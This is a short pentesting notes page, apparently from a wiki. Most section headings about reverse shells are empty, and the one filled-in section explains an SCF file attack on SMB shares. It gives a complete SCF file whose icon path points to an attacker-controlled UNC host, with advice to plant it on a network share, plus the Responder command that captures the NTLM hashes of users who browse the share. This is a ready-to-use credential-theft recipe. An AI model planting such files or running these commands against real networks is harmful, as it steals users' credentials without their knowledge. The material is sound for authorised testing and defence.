Reverse Shells

Software specific shells

Shell Upgrades

Shell Fixes

Reverse shell files

SCF files

https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/ It is not new that SCF (Shell Command Files) files can be used to perform a limited set of operations such as showing the Windows desktop or opening a Windows explorer. However a SCF file can be used to access a specific UNC path which allows the penetration tester to build an attack. The code below can be placed inside a text file which then needs to be planted into a network share. Saving the pentestlab.txt file as SCF file will make the file to be executed when the user will browse the file. Adding the @ symbol in front of the filename will place the pentestlab.scf on the top of the share drive.

[Shell]
Command=2
IconFile=\\X.X.X.X\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

Responder needs to be executed with the following parameters to capture the hashes of the users that will browse the share.

responder -wrf --lm -v -I eth0

Last updated